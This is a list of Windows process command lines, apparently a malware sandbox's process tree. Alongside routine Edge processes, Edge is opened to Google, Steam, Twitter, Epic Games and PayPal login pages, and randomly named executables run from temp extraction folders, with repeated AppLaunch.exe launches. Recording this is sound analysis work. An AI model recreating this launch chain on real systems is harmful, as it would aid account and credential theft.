"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff843cb46f8,0x7ff843cb4708,0x7ff843cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff843cb46f8,0x7ff843cb4708,0x7ff843cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff843cb46f8,0x7ff843cb4708,0x7ff843cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff843cb46f8,0x7ff843cb4708,0x7ff843cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x40,0x16c,0x7ff843cb46f8,0x7ff843cb4708,0x7ff843cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x148,0x170,0x7ff843cb46f8,0x7ff843cb4708,0x7ff843cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff843cb46f8,0x7ff843cb4708,0x7ff843cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff843cb46f8,0x7ff843cb4708,0x7ff843cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,4033172932542255565,820926077693656777,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,11968864724054103788,16949942370129669072,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,11968864724054103788,16949942370129669072,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1992 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2268 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,4033172932542255565,820926077693656777,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,1739929218482369560,16031172266000532866,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,1739929218482369560,16031172266000532866,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff843cb46f8,0x7ff843cb4708,0x7ff843cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1556,1223519091113919437,8632041722928729955,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4076 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,1139551487477742509,12714646005731208395,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,4846431870790519868,12828941444815406723,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,4846431870790519868,12828941444815406723,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4472 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff843cb46f8,0x7ff843cb4708,0x7ff843cb4718

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2eY4396.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2eY4396.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4660 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6448 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6456 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7My72nk.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7My72nk.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 7416 -ip 7416

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7416 -s 540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6696 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8sT689HF.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8sT689HF.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7572 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7600 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8576 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8576 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9EE3QR1.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9EE3QR1.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\A9C8.exe

C:\Users\Admin\AppData\Local\Temp\A9C8.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ff843cb46f8,0x7ff843cb4708,0x7ff843cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2212,6928482214711890243,4800566490649117600,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2212,6928482214711890243,4800566490649117600,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,6928482214711890243,4800566490649117600,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6928482214711890243,4800566490649117600,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6928482214711890243,4800566490649117600,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,6928482214711890243,4800566490649117600,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1

